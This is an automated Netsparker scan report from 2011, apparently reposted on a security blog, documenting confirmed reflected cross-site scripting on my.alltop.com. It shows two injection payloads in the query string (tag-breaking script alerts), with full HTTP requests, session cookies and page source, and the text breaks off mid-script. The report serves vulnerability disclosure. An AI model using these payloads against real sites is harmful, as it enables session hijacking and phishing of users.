XSS.CX Research Blog

The DORK Report

Loading

Netsparker, Web Application Security Scanner

NETSPARKER SCAN REPORT SUMMARY

Netsparker - Scan Report Summary
TARGET URL
http://my.alltop.com/#
SCAN DATE
3/8/2011 2:47:57 PM
REPORT DATE
3/8/2011 3:03:30 PM
SCAN DURATION
00:09:55

Total Requests

788

Average Speed

1.32 req/sec.
31
identified
28
confirmed
0
critical
2
informational

SCAN SETTINGS

Scan Settings
PROFILE
Previous Settings
ENABLED ENGINES
Blind SQL Injection, Boolean SQL Injection, HTTP Header Injection, Local File Inclusion, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
IMPORTANT
81 %
LOW
13 %
INFORMATION
6 %
Cross-site Scripting

Cross-site Scripting

24 TOTAL
IMPORTANT
CONFIRMED
24
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hi-jacking users' active session
  • Changing the look of the page within the victims browser.
  • Mounting a successful phishing attack.
  • Intercept data and perform man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /scripts/sifr/

/scripts/sifr/ CONFIRMED

http://my.alltop.com/scripts/sifr/?'"--></style></script><script>alert(0x000079)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x000079)</script>

Request

GET /scripts/sifr/?'"--></style></script><script>netsparker(0x000079)</script> HTTP/1.1
Referer: http://my.alltop.com/scripts/sifr/sifr.js
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Date: Tue, 08 Mar 2011 20:48:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:48 GMT; path=/; domain=.alltop.com,myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com,alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:48:49 GMT; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:49 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22653


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>MyAlltop</title> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <meta name="description" content="Alltop presents all the top stories from ALLTOP_TOPIC_NAME websites. Think of Alltop as an online magazine rack." /> <meta name="keywords" content="" /> <link rel="icon" href="/favicon.ico" type="image/x-icon" /> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <link rel="apple-touch-icon" href="/apple-touch-icon.png" /> <meta name="author" content="electricpulp.com" /> <meta name="robots" content="noindex, nofollow" /> <link rel="stylesheet" href="/css/style.css" type="text/css" media="screen" charset="utf-8" /> <link rel="stylesheet" href="/css/iphone.css" type="text/css" media="only screen and (max-device-width: 480px)" /> <link rel="stylesheet" href="/css/ipad.css" type="text/css" media="only screen and (max-device-width: 1024px)" /> <!--[if IE 6]> <link rel="stylesheet" href="/css/ie_style.css" type="text/css" media="screen" charset="utf-8" /><![endif]--> <!-- Behaviors --> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/mootools/1.11/mootools-yui-compressed.js" charset="utf-8"></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop-clean.js" charset="utf-8"></script> <script type="text/javascript" charset="utf-8"><!--// <![CDATA[ var resultsSlider; var load_method = (window.ie ? 'load' : 'domready'); window.addEvent(load_method, function(){ resultsSlider = new Fx.Slide('results', {duration: 500}); resultsSlider.hide(); }); var skip_nav = true; // ]]> --></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop.js" charset="utf-8"></script> <style type="text/css"> .add-feed { display:none; } </style> <!-- Analytics --> <script type="text/javascript"> window.google_analytics_uacct = "UA-1701157-4"; </script> <!-- Ads --> <script type='text/javascript'><!--// <![CDATA[ var OA_source = 'test'; var OA_zones = { 'leaderboard' : 70, 'slot_3_1' : 2, 'slot_3_2' : 3, 'slot_3_300_250' : 66, 'slot_9_300_250' : 69, 'slot_6_1' : 59, 'slot_6_2' : 60, 'slot_9_1' : 57, 'slot_9_2' : 58, 'slot_3' : 24, 'slot_6' : 4, 'slot_9' : 49 } // ]]> --></script> <script type='text/javascript' src='http://at-adserver.alltop.com/openx/www/delivery/spcjs.php?id=1&amp;target=_blank'></script> <!-- Typography --> <script type="text/javascript" src="/scripts/sifr/sifr.js"></script> <script type="text/javascript" src="/scripts/sifr/sifr-config.js"></script></head><body><script type='text/javascript'><!--// <![CDATA[OA_show('top_script');// ]]> --></script> <div id="opener"> <a href="http://alltop.com/" id="logo">Alltop</a> <div id="leaderboard"> <script type='text/javascript'><!--// <![CDATA[ OA_show('leaderboard'); // ]]> --></script> </div></div> <div id="wrap-discover"> <div id="discover" class="clearfix"> <div id="discover-by-cat"> <ul id="categories"> <li><a href="/topic/work" rel="1">Work</a></li><li><a href="/topic/health" rel="2">Health</a></li><li><a href="/topic/culture" rel="3">Culture</a></li><li><a href="/topic/interests" rel="4">Interests</a></li><li><a href="/topic/tech" rel="5">Tech</a></li><li><a href="/topic/people" rel="6">People</a></li><li><a href="/topic/good" rel="7">Good</a></li><li><a href="/topic/news" rel="8">News</a></li><li><a href="/topic/geos" rel="9">Geos</a></li><li><a href="/topic/sports" rel="10">Sports</a></li> </ul> </div> <div id="discover-alpha"> <ul id="alpha"> <li><a href="/alpha/a" rel="A">A</a></li><li><a href="/alpha/b" rel="B">B</a></li><li><a href="/alpha/c" rel="C">C</a></li><li><a href="/alpha/d" rel="D">D</a></li><li><a href="/alpha/e" rel="E">E</a></li><li><a href="/alpha/f" rel="F">F</a></li><li><a href="/alpha/g" rel="G">G</a></li><li><a href="/alpha/h" rel="H">H</a></li><li><a href="/alpha/i" rel="I">I</a></li><li><a href="/alpha/j" rel="J">J</a></li><li><a href="/alpha/k" rel="K">K</a></li><li><a href="/alpha/l" rel="L">L</a></li><li><a href="/alpha/m" rel="M">M</a></li><li><a href="/alpha/n" rel="N">N</a></li><li><a href="/alpha/o" rel="O">O</a></li><li><a href="/alpha/p" rel="P">P</a></li><li><a href="/alpha/q" rel="Q">Q</a></li><li><a href="/alpha/r" rel="R">R</a></li><li><a href="/alpha/s" rel="S">S</a></li><li><a href="/alpha/t" rel="T">T</a></li><li><a href="/alpha/u" rel="U">U</a></li><li><a href="/alpha/v" rel="V">V</a></li><li><a href="/alpha/w" rel="W">W</a></li><li><a href="/alpha/x" rel="X">X</a></li><li><a href="/alpha/y" rel="Y">Y</a></li><li><a href="/alpha/z" rel="Z">Z</a></li><li><a href="/alpha/#" rel="#">#</a></li> </ul> </div> </div> </div> <div id="wrap-search"> <div id="search" class="clearfix"> <ul id="navigation" class="tabs"> <li><a href="http://alltop.com/" class="hot-topics">Hot Topics</a></li> <li><a href="http://alltop.com/?new_topics=true" class="new-topics">New Topics</a></li> <li><a href="http://alltop.com/?recent_topics=true" class="my-recent-topics">My Recent Topics</a></li> <li class="here"><a href="http://my.alltop.com/" class="myalltop">MyAlltop</a></li> <li><a href="http://holykaw.alltop.com/" class="holykaw">HolyKaw</a></li> </ul> <div id="search-box"> <form action="/" method="get" id="search-form"> <input type="text" name="keywords" value="" id="key-words" /> <input type="image" src="/img/search-bttn.gif" id="bttn-search" /> </form> </div> </div> </div> <div id="wrap-results"> <div id="slide-results"> <div id="results" class="clearfix" style="visibility:hidden;"> </div> </div></div><div id="headlines" class="hfeed clearfix"> <h1 id="pagetitle" class="din"> Selected by ALLTOP_TOPIC_NAME </h1> <ul id="top-five" class="feed-block"> <li class="site"> <h2>Most Topular Stories</h2> </li> <li class="hentry"> <h3 class="entry-title"><a href="http://feedproxy.google.com/~r/typepad/GuyKawasaki/alltop/~3/FYTNhMDBC1Y/how-to-get-a-free-copy-of-guykawasakis-first-book-the-macintosh-way.html" rel="bookmark" target="_blank">How to get a free copy of @guykawasaki's first book, The Macintosh Way</a></h3> <div class="full-post"> <div class="site-title">Alltop News and Updates</div> <div class="author">GuyKawasaki</div> <div class="published">17 Nov 2010 | 12:33 am</div> <div class="entry-content"> <div class="entry-bound">Guy Kawasaki has set his first book, The Macintosh Way, free. To get it, all you have to do is “like” the Facebook fan page of his next book, Enchantment: The Art of Changing Hearts, Minds, and Actions. Click on the “Like” button.</div> </div> </div> </li> </ul> <ul id="feed832086" class="feed-block f8d42cf47d0c0ee7cc5e4760157409d3"> <li class="site"><div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div><h2><a href="http://blog.alltop.com/" target="_blank" class="snap_shots">Alltop News and Updates</a></h2></li><li class="hentry"><h3 class="entry-title"><a href="http://feedproxy.google.com/~r/typepad/GuyKawasaki/alltop/~3/FYTNhMDBC1Y/how-to-get-a-free-copy-of-guykawasakis-first-book-the-macintosh-way.html" rel="bookmark" target="_blank">How to get a free copy of @guykawasaki's first book, The Macintosh Way</a></h3><div class="full-post"><div class="author">GuyKawasaki</div><div class="published">17 Nov 2010 | 12:33 am</div><div class="entry-content"><div class="entry-bound">Guy Kawasaki has set his first book, The Macintosh Way, free. To get it, all you have to do is “like” the Facebook fan page of his next book, Enchantment: The Art of Changing Hearts, Minds, and Actions. Click on the “Like” button.</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://feedproxy.google.com/~r/typepad/GuyKawasaki/alltop/~3/FdstPJkqQ98/want-country-specific-news.html" rel="bookmark" target="_blank">Want country-specific news?</a></h3><div class="full-post"><div class="author">GuyKawasaki</div><div class="published">15 Nov 2010 | 7:58 am</div><div class="entry-content"><div class="entry-bound">If you’d like country-specific news, please click here. We’ve aggregated news for approximately forty-five countries to make it easy and fast for you.</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://feedproxy.google.com/~r/typepad/GuyKawasaki/alltop/~3/hJCdkI9srKA/how-to-get-a-free-copy-of-guykawasakis-first-book-the-macintosh-way.html" rel="bookmark" target="_blank">How to get a free copy of @guykawasaki's first book, The Macintosh Way</a></h3><div class="full-post"><div class="author">GuyKawasaki</div><div class="published">2 Aug 2010 | 10:23 am</div><div class="entry-content"><div class="entry-bound">Guy has set his first book free. Get it here. He wrote this book in 1987 in order to explain the Macintosh Way of doing the right things the right way.</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://feedproxy.google.com/~r/typepad/GuyKawasaki/alltop/~3/eEAs7Gfb4Yk/if-you-have-a-love-of-nature-youll-love-these-sites.html" rel="bookmark" target="_blank">If you have a love of Nature, you'll love these sites:</a></h3><div class="full-post"><div class="author">GuyKawasaki</div><div class="published">17 May 2010 | 11:09 pm</div><div class="entry-content"><div class="entry-bound">Check out our latest additions: Nature.alltop and Nature.com.alltop. The former contains the blogs and websites of nature lovers. The latter contains all of the feeds from Nature.com. And don’t forget that we have cover ecology at Green.alltop.</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://feedproxy.google.com/~r/typepad/GuyKawasaki/alltop/~3/Pm9rU7ZCgwY/how-to-stay-on-top-of-immigration-news-and-issues.html" rel="bookmark" target="_blank">How to stay on top of immigration news and issues</a></h3><div class="full-post"><div class="author">GuyKawasaki</div><div class="published">17 May 2010 | 11:23 am</div><div class="entry-content"><div class="entry-bound">People who like to stay on top of immigration news and issues will find Immigration.alltop very useful. We aggregate the best websites and blogs about immigration news there.</div></div></div></li></ul></div><div id="footer" class="clearfix"> <p class="copyright">&copy; 2011 Nononina, Inc. All Rights Reserved</p> <p class="navigation"> <a href="http://alltop.com/about/">About</a> &middot; <a href="http://alltop.com/advertising/">Advertising</a> &middot; <a href="http://alltop.com/submission/">Submissions</a> &middot; <a href="http://alltop.com/contact-us/">Contact Us</a> &middot; <a href="http://blog.alltop.com/">Blog</a> &middot; <a href="http://alltop.com/goodies/">Goodies</a> &middot; <a href="http://alltop.com/legal/" rel="nofollow">Legal</a> </p> <p class="site-credits">Powered by <a href="http://rackspace.com">a Rackspace Dedicated Server</a> &middot; Inspired by <a href="http://popurls.com">popurls</a> &middot; Site by <a href="http://electricpulp.com" rel="cool">Electric Pulp</a> </p></div><script type="text/javascript" charset="utf-8">

function signup_form_submit() {
var f = $('the-signup-form');
f.ajax.value=1;
new Ajax(f.action, {
method: 'post',
data: $('the-signup-form'),
onRequest: function(){
},
onComplete: function(response){
if (response==0) {
$('sign-up-form-html').effect('opacity', {
duration: 500,
fps: 75,
onComplete: function(){
$('sign-up-form-html').style.display = 'none';
$('sign-up-form-message').style.display = 'block';
$('sign-up-form-message').effect('opacity', {
duration: 500,
fps: 75
}).start(1);
}
}).start(0);
}
else {
alert(response);
}
},
onFailure: function(){
}
}).request();
}
function password_change_form_submit() {
var f = $('the-password-change-form');
f.ajax.value=1;
new Ajax(f.action, {
method: 'post',
data: $('the-password-change-form'),
onRequest: function(){
},
onComplete: function(response){
if (response==0) {
$('password-change-form-html').effect('opacity', {
duration: 500,
fps: 75,
onComplete: function(){
$('password-change-form-html').style.display = 'none';
$('password-change-form-message').style.display = 'block';
$('password-change-form-message').effect('opacity', {
duration: 500,
fps: 75
}).start(1);
}
}).start(0);
}
else {
alert(response);
}
},
onFailure: function(){
}
}).request();
}
var shown_form_id = null;
function show_form(form_el_id) {
var sout = false;
if ($(form_el_id).style.display == 'block') {
sout = true;
}
$('slide-wrapper').style.display='block';
$('log-in').style.display='none';
$('sign-up').style.display='none';
$('password-recovery').style.display='none';
$('password-change').style.display='none';
$(form_el_id).style.display='block';
if (sout) {
accountsSlider.slideOut();
- /css/

/css/ CONFIRMED

http://my.alltop.com/css/?'"--></style></script><script>alert(0x0000A6)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0000A6)</script>

Request

GET /css/?'"--></style></script><script>netsparker(0x0000A6)</script> HTTP/1.1
Referer: http://my.alltop.com/css/style.css
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Date: Tue, 08 Mar 2011 20:48:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:56 GMT; path=/; domain=.alltop.com,myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com,alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:48:57 GMT; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:57 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22617


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>MyAlltop</title> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <meta name="description" content="Alltop presents all the top stories from ALLTOP_TOPIC_NAME websites. Think of Alltop as an online magazine rack." /> <meta name="keywords" content="" /> <link rel="icon" href="/favicon.ico" type="image/x-icon" /> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <link rel="apple-touch-icon" href="/apple-touch-icon.png" /> <meta name="author" content="electricpulp.com" /> <meta name="robots" content="noindex, nofollow" /> <link rel="stylesheet" href="/css/style.css" type="text/css" media="screen" charset="utf-8" /> <link rel="stylesheet" href="/css/iphone.css" type="text/css" media="only screen and (max-device-width: 480px)" /> <link rel="stylesheet" href="/css/ipad.css" type="text/css" media="only screen and (max-device-width: 1024px)" /> <!--[if IE 6]> <link rel="stylesheet" href="/css/ie_style.css" type="text/css" media="screen" charset="utf-8" /><![endif]--> <!-- Behaviors --> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/mootools/1.11/mootools-yui-compressed.js" charset="utf-8"></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop-clean.js" charset="utf-8"></script> <script type="text/javascript" charset="utf-8"><!--// <![CDATA[ var resultsSlider; var load_method = (window.ie ? 'load' : 'domready'); window.addEvent(load_method, function(){ resultsSlider = new Fx.Slide('results', {duration: 500}); resultsSlider.hide(); }); var skip_nav = true; // ]]> --></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop.js" charset="utf-8"></script> <style type="text/css"> .add-feed { display:none; } </style> <!-- Analytics --> <script type="text/javascript"> window.google_analytics_uacct = "UA-1701157-4"; </script> <!-- Ads --> <script type='text/javascript'><!--// <![CDATA[ var OA_source = 'test'; var OA_zones = { 'leaderboard' : 70, 'slot_3_1' : 2, 'slot_3_2' : 3, 'slot_3_300_250' : 66, 'slot_9_300_250' : 69, 'slot_6_1' : 59, 'slot_6_2' : 60, 'slot_9_1' : 57, 'slot_9_2' : 58, 'slot_3' : 24, 'slot_6' : 4, 'slot_9' : 49 } // ]]> --></script> <script type='text/javascript' src='http://at-adserver.alltop.com/openx/www/delivery/spcjs.php?id=1&amp;target=_blank'></script> <!-- Typography --> <script type="text/javascript" src="/scripts/sifr/sifr.js"></script> <script type="text/javascript" src="/scripts/sifr/sifr-config.js"></script></head><body><script type='text/javascript'><!--// <![CDATA[OA_show('top_script');// ]]> --></script> <div id="opener"> <a href="http://alltop.com/" id="logo">Alltop</a> <div id="leaderboard"> <script type='text/javascript'><!--// <![CDATA[ OA_show('leaderboard'); // ]]> --></script> </div></div> <div id="wrap-discover"> <div id="discover" class="clearfix"> <div id="discover-by-cat"> <ul id="categories"> <li><a href="/topic/work" rel="1">Work</a></li><li><a href="/topic/health" rel="2">Health</a></li><li><a href="/topic/culture" rel="3">Culture</a></li><li><a href="/topic/interests" rel="4">Interests</a></li><li><a href="/topic/tech" rel="5">Tech</a></li><li><a href="/topic/people" rel="6">People</a></li><li><a href="/topic/good" rel="7">Good</a></li><li><a href="/topic/news" rel="8">News</a></li><li><a href="/topic/geos" rel="9">Geos</a></li><li><a href="/topic/sports" rel="10">Sports</a></li> </ul> </div> <div id="discover-alpha"> <ul id="alpha"> <li><a href="/alpha/a" rel="A">A</a></li><li><a href="/alpha/b" rel="B">B</a></li><li><a href="/alpha/c" rel="C">C</a></li><li><a href="/alpha/d" rel="D">D</a></li><li><a href="/alpha/e" rel="E">E</a></li><li><a href="/alpha/f" rel="F">F</a></li><li><a href="/alpha/g" rel="G">G</a></li><li><a href="/alpha/h" rel="H">H</a></li><li><a href="/alpha/i" rel="I">I</a></li><li><a href="/alpha/j" rel="J">J</a></li><li><a href="/alpha/k" rel="K">K</a></li><li><a href="/alpha/l" rel="L">L</a></li><li><a href="/alpha/m" rel="M">M</a></li><li><a href="/alpha/n" rel="N">N</a></li><li><a href="/alpha/o" rel="O">O</a></li><li><a href="/alpha/p" rel="P">P</a></li><li><a href="/alpha/q" rel="Q">Q</a></li><li><a href="/alpha/r" rel="R">R</a></li><li><a href="/alpha/s" rel="S">S</a></li><li><a href="/alpha/t" rel="T">T</a></li><li><a href="/alpha/u" rel="U">U</a></li><li><a href="/alpha/v" rel="V">V</a></li><li><a href="/alpha/w" rel="W">W</a></li><li><a href="/alpha/x" rel="X">X</a></li><li><a href="/alpha/y" rel="Y">Y</a></li><li><a href="/alpha/z" rel="Z">Z</a></li><li><a href="/alpha/#" rel="#">#</a></li> </ul> </div> </div> </div> <div id="wrap-search"> <div id="search" class="clearfix"> <ul id="navigation" class="tabs"> <li><a href="http://alltop.com/" class="hot-topics">Hot Topics</a></li> <li><a href="http://alltop.com/?new_topics=true" class="new-topics">New Topics</a></li> <li><a href="http://alltop.com/?recent_topics=true" class="my-recent-topics">My Recent Topics</a></li> <li class="here"><a href="http://my.alltop.com/" class="myalltop">MyAlltop</a></li> <li><a href="http://holykaw.alltop.com/" class="holykaw">HolyKaw</a></li> </ul> <div id="search-box"> <form action="/" method="get" id="search-form"> <input type="text" name="keywords" value="" id="key-words" /> <input type="image" src="/img/search-bttn.gif" id="bttn-search" /> </form> </div> </div> </div> <div id="wrap-results"> <div id="slide-results"> <div id="results" class="clearfix" style="visibility:hidden;"> </div> </div></div><div id="headlines" class="hfeed clearfix"> <h1 id="pagetitle" class="din"> Selected by ALLTOP_TOPIC_NAME </h1> <ul id="top-five" class="feed-block"> <li class="site"> <h2>Most Topular Stories</h2> </li> <li class="hentry"> <h3 class="entry-title"><a href="http://feedproxy.google.com/~r/typepad/GuyKawasaki/alltop/~3/FYTNhMDBC1Y/how-to-get-a-free-copy-of-guykawasakis-first-book-the-macintosh-way.html" rel="bookmark" target="_blank">How to get a free copy of @guykawasaki's first book, The Macintosh Way</a></h3> <div class="full-post"> <div class="site-title">Alltop News and Updates</div> <div class="author">GuyKawasaki</div> <div class="published">17 Nov 2010 | 12:33 am</div> <div class="entry-content"> <div class="entry-bound">Guy Kawasaki has set his first book, The Macintosh Way, free. To get it, all you have to do is “like” the Facebook fan page of his next book, Enchantment: The Art of Changing Hearts, Minds, and Actions. Click on the “Like” button.</div> </div> </div> </li> </ul> <ul id="feed832086" class="feed-block f8d42cf47d0c0ee7cc5e4760157409d3"> <li class="site"><div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div><h2><a href="http://blog.alltop.com/" target="_blank" class="snap_shots">Alltop News and Updates</a></h2></li><li class="hentry"><h3 class="entry-title"><a href="http://feedproxy.google.com/~r/typepad/GuyKawasaki/alltop/~3/FYTNhMDBC1Y/how-to-get-a-free-copy-of-guykawasakis-first-book-the-macintosh-way.html" rel="bookmark" target="_blank">How to get a free copy of @guykawasaki's first book, The Macintosh Way</a></h3><div class="full-post"><div class="author">GuyKawasaki</div><div class="published">17 Nov 2010 | 12:33 am</div><div class="entry-content"><div class="entry-bound">Guy Kawasaki has set his first book, The Macintosh Way, free. To get it, all you have to do is “like” the Facebook fan page of his next book, Enchantment: The Art of Changing Hearts, Minds, and Actions. Click on the “Like” button.</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://feedproxy.google.com/~r/typepad/GuyKawasaki/alltop/~3/FdstPJkqQ98/want-country-specific-news.html" rel="bookmark" target="_blank">Want country-specific news?</a></h3><div class="full-post"><div class="author">GuyKawasaki</div><div class="published">15 Nov 2010 | 7:58 am</div><div class="entry-content"><div class="entry-bound">If you’d like country-specific news, please click here. We’ve aggregated news for approximately forty-five countries to make it easy and fast for you.</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://feedproxy.google.com/~r/typepad/GuyKawasaki/alltop/~3/hJCdkI9srKA/how-to-get-a-free-copy-of-guykawasakis-first-book-the-macintosh-way.html" rel="bookmark" target="_blank">How to get a free copy of @guykawasaki's first book, The Macintosh Way</a></h3><div class="full-post"><div class="author">GuyKawasaki</div><div class="published">2 Aug 2010 | 10:23 am</div><div class="entry-content"><div class="entry-bound">Guy has set his first book free. Get it here. He wrote this book in 1987 in order to explain the Macintosh Way of doing the right things the right way.</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://feedproxy.google.com/~r/typepad/GuyKawasaki/alltop/~3/eEAs7Gfb4Yk/if-you-have-a-love-of-nature-youll-love-these-sites.html" rel="bookmark" target="_blank">If you have a love of Nature, you'll love these sites:</a></h3><div class="full-post"><div class="author">GuyKawasaki</div><div class="published">17 May 2010 | 11:09 pm</div><div class="entry-content"><div class="entry-bound">Check out our latest additions: Nature.alltop and Nature.com.alltop. The former contains the blogs and websites of nature lovers. The latter contains all of the feeds from Nature.com. And don’t forget that we have cover ecology at Green.alltop.</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://feedproxy.google.com/~r/typepad/GuyKawasaki/alltop/~3/Pm9rU7ZCgwY/how-to-stay-on-top-of-immigration-news-and-issues.html" rel="bookmark" target="_blank">How to stay on top of immigration news and issues</a></h3><div class="full-post"><div class="author">GuyKawasaki</div><div class="published">17 May 2010 | 11:23 am</div><div class="entry-content"><div class="entry-bound">People who like to stay on top of immigration news and issues will find Immigration.alltop very useful. We aggregate the best websites and blogs about immigration news there.</div></div></div></li></ul></div><div id="footer" class="clearfix"> <p class="copyright">&copy; 2011 Nononina, Inc. All Rights Reserved</p> <p class="navigation"> <a href="http://alltop.com/about/">About</a> &middot; <a href="http://alltop.com/advertising/">Advertising</a> &middot; <a href="http://alltop.com/submission/">Submissions</a> &middot; <a href="http://alltop.com/contact-us/">Contact Us</a> &middot; <a href="http://blog.alltop.com/">Blog</a> &middot; <a href="http://alltop.com/goodies/">Goodies</a> &middot; <a href="http://alltop.com/legal/" rel="nofollow">Legal</a> </p> <p class="site-credits">Powered by <a href="http://rackspace.com">a Rackspace Dedicated Server</a> &middot; Inspired by <a href="http://popurls.com">popurls</a> &middot; Site by <a href="http://electricpulp.com" rel="cool">Electric Pulp</a> </p></div><script type="text/javascript" charset="utf-8">

function signup_form_submit() {
var f = $('the-signup-form');
f.ajax.value=1;
new Ajax(f.action, {
method: 'post',
data: $('the-signup-form'),
onRequest: function(){
},
onComplete: function(response){
if (response==0) {
$('sign-up-form-html').effect('opacity', {
duration: 500,
fps: 75,
onComplete: function(){
$('sign-up-form-html').style.display = 'none';
$('sign-up-form-message').style.display = 'block';
$('sign-up-form-message').effect('opacity', {
duration: 500,
fps: 75
}).start(1);
}
}).start(0);
}
else {
alert(response);
}
},
onFailure: function(){
}
}).request();
}
function password_change_form_submit() {
var f = $('the-password-change-form');
f.ajax.value=1;
new Ajax(f.action, {
method: 'post',
data: $('the-password-change-form'),
onRequest: function(){
},
